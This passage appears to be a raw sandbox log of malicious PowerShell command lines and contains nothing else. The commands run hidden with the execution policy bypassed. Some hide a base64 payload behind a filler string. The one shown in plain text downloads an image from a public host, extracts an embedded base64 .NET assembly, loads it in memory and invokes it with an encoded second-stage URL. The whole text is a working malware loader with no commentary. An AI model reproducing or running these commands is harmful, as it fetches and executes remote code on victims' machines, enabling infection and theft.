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ShUWCcUzBkdIShUWCcUzBkdIwShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdILQBhShUWCcUzBkdIG4ShUWCcUzBkdIZShUWCcUzBkdIShUWCcUzBkdIgShUWCcUzBkdICQShUWCcUzBkdIZQBuShUWCcUzBkdIGQShUWCcUzBkdISQBuShUWCcUzBkdIGQShUWCcUzBkdIZQB4ShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdILQBnShUWCcUzBkdIHQShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdIkShUWCcUzBkdIHMShUWCcUzBkdIdShUWCcUzBkdIBhShUWCcUzBkdIHIShUWCcUzBkdIdShUWCcUzBkdIBJShUWCcUzBkdIG4ShUWCcUzBkdIZShUWCcUzBkdIBlShUWCcUzBkdIHgShUWCcUzBkdIOwShUWCcUzBkdIkShUWCcUzBkdIHMShUWCcUzBkdIdShUWCcUzBkdIBhShUWCcUzBkdIHIShUWCcUzBkdIdShUWCcUzBkdIBJShUWCcUzBkdIG4ShUWCcUzBkdIZShUWCcUzBkdIBlShUWCcUzBkdIHgShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdIrShUWCcUzBkdID0ShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdIkShUWCcUzBkdIHMShUWCcUzBkdIdShUWCcUzBkdIBhShUWCcUzBkdIHIShUWCcUzBkdIdShUWCcUzBkdIBGShUWCcUzBkdIGwShUWCcUzBkdIYQBnShUWCcUzBkdIC4ShUWCcUzBkdITShUWCcUzBkdIBlShUWCcUzBkdIG4ShUWCcUzBkdIZwB0ShUWCcUzBkdIGgShUWCcUzBkdIOwShUWCcUzBkdIkShUWCcUzBkdIGIShUWCcUzBkdIYQBzShUWCcUzBkdIGUShUWCcUzBkdINgShUWCcUzBkdI0ShUWCcUzBkdIEwShUWCcUzBkdIZQBuShUWCcUzBkdIGcShUWCcUzBkdIdShUWCcUzBkdIBoShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdIPQShUWCcUzBkdIgShUWCcUzBkdICQShUWCcUzBkdIZQBuShUWCcUzBkdIGQShUWCcUzBkdISQBuShUWCcUzBkdIGQShUWCcUzBkdIZQB4ShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdILQShUWCcUzBkdIgShUWCcUzBkdICQShUWCcUzBkdIcwB0ShUWCcUzBkdIGEShUWCcUzBkdIcgB0ShUWCcUzBkdIEkShUWCcUzBkdIbgBkShUWCcUzBkdIGUShUWCcUzBkdIeShUWCcUzBkdIShUWCcUzBkdI7ShUWCcUzBkdICQShUWCcUzBkdIYgBhShUWCcUzBkdIHMShUWCcUzBkdIZQShUWCcUzBkdI2ShUWCcUzBkdIDQShUWCcUzBkdIQwBvShUWCcUzBkdIG0ShUWCcUzBkdIbQBhShUWCcUzBkdIG4ShUWCcUzBkdIZShUWCcUzBkdIShUWCcUzBkdIgShUWCcUzBkdID0ShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdIkShUWCcUzBkdIGkShUWCcUzBkdIbQBhShUWCcUzBkdIGcShUWCcUzBkdIZQBUShUWCcUzBkdIGUShUWCcUzBkdIeShUWCcUzBkdIB0ShUWCcUzBkdIC4ShUWCcUzBkdIUwB1ShUWCcUzBkdIGIShUWCcUzBkdIcwB0ShUWCcUzBkdIHIShUWCcUzBkdIaQBuShUWCcUzBkdIGcShUWCcUzBkdIKShUWCcUzBkdIShUWCcUzBkdIkShUWCcUzBkdIHMShUWCcUzBkdIdShUWCcUzBkdIBhShUWCcUzBkdIHIShUWCcUzBkdIdShUWCcUzBkdIBJShUWCcUzBkdIG4ShUWCcUzBkdIZShUWCcUzBkdIBlShUWCcUzBkdIHgShUWCcUzBkdILShUWCcUzBkdIShUWCcUzBkdIgShUWCcUzBkdICQShUWCcUzBkdIYgBhShUWCcUzBkdIHMShUWCcUzBkdIZQShUWCcUzBkdI2ShUWCcUzBkdIDQShUWCcUzBkdITShUWCcUzBkdIBlShUWCcUzBkdIG4ShUWCcUzBkdIZwB0ShUWCcUzBkdIGgShUWCcUzBkdIKQShUWCcUzBkdI7ShUWCcUzBkdICQShUWCcUzBkdIYwBvShUWCcUzBkdIG0ShUWCcUzBkdIbQBhShUWCcUzBkdIG4ShUWCcUzBkdIZShUWCcUzBkdIBCShUWCcUzBkdIHkShUWCcUzBkdIdShUWCcUzBkdIBlShUWCcUzBkdIHMShUWCcUzBkdIIS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kdIBNShUWCcUzBkdIFMShUWCcUzBkdIOShUWCcUzBkdIB2ShUWCcUzBkdIE8ShUWCcUzBkdIbgBCShUWCcUzBkdIDShUWCcUzBkdIShUWCcUzBkdIZShUWCcUzBkdIBHShUWCcUzBkdIGcShUWCcUzBkdIPQShUWCcUzBkdInShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdILShUWCcUzBkdIShUWCcUzBkdIgShUWCcUzBkdICcShUWCcUzBkdIZShUWCcUzBkdIBmShUWCcUzBkdIGQShUWCcUzBkdIZgBkShUWCcUzBkdICcShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdIsShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdIJwBkShUWCcUzBkdIGYShUWCcUzBkdIZShUWCcUzBkdIBmShUWCcUzBkdICcShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdIsShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdIJwBkShUWCcUzBkdIGYShUWCcUzBkdIZShUWCcUzBkdIBmShUWCcUzBkdICcShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdIsShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdIJwBkShUWCcUzBkdIGEShUWCcUzBkdIZShUWCcUzBkdIBzShUWCcUzBkdIGEShUWCcUzBkdIJwShUWCcUzBkdIgShUWCcUzBkdICwShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdInShUWCcUzBkdIGQShUWCcUzBkdIZQShUWCcUzBkdInShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdILShUWCcUzBkdIShUWCcUzBkdIgShUWCcUzBkdICcShUWCcUzBkdIYwB1ShUWCcUzBkdICcShUWCcUzBkdIKQShUWCcUzBkdIpShUWCcUzBkdIShUWCcUzBkdI==';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('ShUWCcUzBkdI','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/634/676/original/rumpe.jpg?1697053529';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LjQ2ZXNhYmVsaWZkZXRhZHB1ZGlvcmRkZW1tYWhvbS80NzEuNzMuNDUyLjU4MS8vOnB0dGg=' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"
cmdline powershell -command "$Codigo = 'JShUWCcUzBkdIBpShUWCcUzBkdIG0ShUWCcUzBkdIYQBnShUWCcUzBkdIGUShUWCcUzBkdIVQByShUWCcUzBkdIGwShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdI9ShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdIJwBoShUWCcUzBkdIHQShUWCcUzBkdIdShUWCcUzBkdIBwShUWCcUzBkdIHMShUWCcUzBkdIOgShUWCcUzBkdIvShUWCcUzBkdIC8ShUWCcUzBkdIdQBwShUWCcUzBkdIGwShUWCcUzBkdIbwBhShUWCcUzBkdIGQShUWCcUzBkdIZShUWCcUzBkdIBlShUWCcUzBkdIGkShUWCcUzBkdIbQBhShUWCcUzBkdIGcShUWCcUzBkdIZQBuShUWCcUzBkdIHMShUWCcUzBkdILgBjShUWCcUzBkdIG8ShUWCcUzBkdIbQShUWCcUzBkdIuShUWCcUzBkdIGIShUWCcUzBkdIcgShUWCcUzBkdIvShUWCcUzBkdIGkShUWCcUzBkdIbQBhShUWCcUzBkdIGcShUWCcUzBkdIZQBzShUWCcUzBkdIC8ShUWCcUzBkdIMShUWCcUzBkdIShUWCcUzBkdIwShUWCcUzBkdIDQShUWCcUzBkdILwShUWCcUzBkdI2ShUWCcUzBkdIDMShUWCcUzBkdINShUWCcUzBkdIShUWCcUzBkdIvShUWCcUzBkdIDYShUWCcUzBkdINwShUWCcUzBkdI2ShUWCcUzBkdIC8ShUWCcUzBkdIbwByShUWCcUzBkdIGkShUWCcUzBkdIZwBpShUWCcUzBkdIG4ShUWCcUzBkdIYQBsShUWCcUzBkdIC8ShUWCcUzBkdIcgB1ShUWCcUzBkdIG0ShUWCcUzBkdIcShUWCcUzBkdIBlShUWCcUzBkdIC4ShUWCcUzBkdIagBwShUWCcUzBkdIGcShUWCcUzBkdIPwShUWCcUzBkdIxShUWCcUzBkdIDYShUWCcUzBkdIOQShUWCcUzBkdI3ShUWCcUzBkdIDShUWCcUzBkdIShUWCcUzBkdINQShUWCcUzBkdIzShUWCcUzBkdIDUShUWCcUzBkdIMgShUWCcUzBkdI5ShUWCcUzBkdICcShUWCcUzBkdIOwShUWCcUzBkdIkShUWCcUzBkdIHcShUWCcUzBkdIZQBiShUWCcUzBkdIEMShUWCcUzBkdIbShUWCcUzBkdIBpShUWCcUzBkdIGUShUWCcUzBkdIbgB0ShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdIPQShUWCcUzBkdIgShUWCcUzBkdIE4ShUWCcUzBkdIZQB3ShUWCcUzBkdIC0ShUWCcUzBkdITwBiShUWCcUzBkdIGoShUWCcUzBkdIZQBjShUWCcUzBkdIHQShUWCcUzBkdIIShUWCcUzBkdIBTShUWCcUzBkdIHkShUWCcUzBkdIcwB0ShUWCcUzBkdIGUShUWCcUzBkdIbQShUWCcUzBkdIuShUWCcUzBkdIE4ShUWCcUzBkdIZQB0ShUWCcUzBkdIC4ShUWCcUzBkdIVwBlShUWCcUzBkdIGIShUWCcUzBkdIQwBsShUWCcUzBkdIGkShUWCcUzBkdIZQBuShUWCcUzBkdIHQShUWCcUzBkdIOwShUWCcUzBkdIkShUWCcUzBkdIGkShUWCcUzBkdIbQBhShUWCcUzBkdIGcShUWCcUzBkdIZQBCShUWCcUzBkdIHkShUWCcUzBkdIdShUWCcUzBkdIBlShUWCcUzBkdIHMShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdI9ShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdIJShUWCcUzBkdIB3ShUWCcUzBkdIGUShUWCcUzBkdIYgBDShUWCcUzBkdIGwShUWCcUzBkdIaQBlShUWCcUzBkdIG4ShUWCcUzBkdIdShUWCcUzBkdIShUWCcUzBkdIuShUWCcUzBkdIEQShUWCcUzBkdIbwB3ShUWCcUzBkdIG4ShUWCcUzBkdIbShUWCcUzBkdIBvShUWCcUzBkdIGEShUWCcUzBkdIZShUWCcUzBkdIBEShUWCcUzBkdIGEShUWCcUzBkdIdShUWCcUzBkdIBhShUWCcUzBkdICgShUWCcUzBkdIJShUWCcUzBkdIBpShUWCcUzBkdIG0ShUWCcUzBkdIYQBnShUWCcUzBkdIGUShUWCcUzBkdIVQByShUWCcUzBkdIGwShUWCcUzBkdIKQShUWCcUzBkdI7ShUWCcUzBkdICQShUWCcUzBkdIaQBtShUWCcUzBkdIGEShUWCcUzBkdIZwBlShUWCcUzBkdIFQShUWCcUzBkdIZQB4ShUWCcUzBkdIHQShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdI9ShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdIWwBTShUWCcUzBkdIHkShUWCcUzBkdIcwB0ShUWCcUzBkdIGUShUWCcUzBkdIbQShUWCcUzBkdIuShUWCcUzBkdIFQShUWCcUzBkdIZQB4ShUWCcUzBkdIHQShUWCcUzBkdILgBFShUWCcUzBkdIG4ShUWCcUzBkdIYwBvShUWCcUzBkdIGQShUWCcUzBkdIaQBuShUWCcUzBkdIGcShUWCcUzBkdIXQShUWCcUzBkdI6ShUWCcUzBkdIDoShUWCcUzBkdIVQBUShUWCcUzBkdIEYShUWCcUzBkdIOShUWCcUzBkdIShUWCcUzBkdIuShUWCcUzBkdIEcShUWCcUzBkdIZQB0ShUWCcUzBkdIFMShUWCcUzBkdIdShUWCcUzBkdIByShUWCcUzBkdIGkShUWCcUzBkdIbgBnShUWCcUzBkdICgShUWCcUzBkdIJShUWCcUzBkdIBpShUWCcUzBkdIG0ShUWCcUzBkdIYQBnShUWCcUzBkdIGUShUWCcUzBkdIQgB5ShUWCcUzBkdIHQShUWCcUzBkdIZQBzShUWCcUzBkdICkShUWCcUzBkdIOwShUWCcUzBkdIkShUWCcUzBkdIHMShUWCcUzBkdIdShUWCcUzBkdIBhShUWCcUzBkdIHIShUWCcUzBkdIdShUWCcUzBkdIBGShUWCcUzBkdIGwShUWCcUzBkdIYQBnShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdIPQShUWCcUzBkdIgShUWCcUzBkdICcShUWCcUzBkdIPShUWCcUzBkdIShUWCcUzBkdI8ShUWCcUzBkdIEIShUWCcUzBkdIQQBTShUWCcUzBkdIEUShUWCcUzBkdINgShUWCcUzBkdI0ShUWCcUzBkdIF8ShUWCcUzBkdIUwBUShUWCcUzBkdIEEShUWCcUzBkdIUgBUShUWCcUzBkdID4ShUWCcUzBkdIPgShUWCcUzBkdInShUWCcUzBkdIDsShUWCcUzBkdIJShUWCcUzBkdIBlShUWCcUzBkdIG4ShUWCcUzBkdIZShUWCcUzBkdIBGShUWCcUzBkdIGwShUWCcUzBkdIYQBnShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdIPQShUWCcUzBkdIgShUWCcUzBkdICcShUWCcUzBkdIPShUWCcUzBkdIShUWCcUzBkdI8ShUWCcUzBkdIEIShUWCcUzBkdIQQBTShUWCcUzBkdIEUShUWCcUzBkdINgShUWCcUzBkdI0ShUWCcUzBkdIF8ShUWCcUzBkdIRQBOShUWCcUzBkdIEQShUWCcUzBkdIPgShUWCcUzBkdI+ShUWCcUzBkdICcShUWCcUzBkdIOwShUWCcUzBkdIkShUWCcUzBkdIHMShUWCcUzBkdIdShUWCcUzBkdIBhShUWCcUzBkdIHIShUWCcUzBkdIdShUWCcUzBkdIBJShUWCcUzBkdIG4ShUWCcUzBkdIZShUWCcUzBkdIBlShUWCcUzBkdIHgShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdI9ShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdIJShUWCcUzBkdIBpShUWCcUzBkdIG0ShUWCcUzBkdIYQBnShUWCcUzBkdIGUShUWCcUzBkdIVShUWCcUzBkdIBlShUWCcUzBkdIHgShUWCcUzBkdIdShUWCcUzBkdIShUWCcUzBkdIuShUWCcUzBkdIEkShUWCcUzBkdIbgBkShUWCcUzBkdIGUShUWCcUzBkdIeShUWCcUzBkdIBPShUWCcUzBkdIGYShUWCcUzBkdIKShUWCcUzBkdIShUWCcUzBkdIkShUWCcUzBkdIHMShUWCcUzBkdIdShUWCcUzBkdIBhShUWCcUzBkdIHIShUWCcUzBkdIdShUWCcUzBkdIBGShUWCcUzBkdIGwShUWCcUzBkdIYQBnShUWCcUzBkdICkShUWCcUzBkdIOwShUWCcUzBkdIkShUWCcUzBkdIGUShUWCcUzBkdIbgBkShUWCcUzBkdIEkShUWCcUzBkdIbgBkShUWCcUzBkdIGUShUWCcUzBkdIeShUWCcUzBkdIShUWCcUzBkdIgShUWCcUzBkdID0ShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdIkShUWCcUzBkdIGkShUWCcUzBkdIbQBhShUWCcUzBkdIGcShUWCcUzBkdIZQBUShUWCcUzBkdIGUShUWCcUzBkdIeShUWCcUzBkdI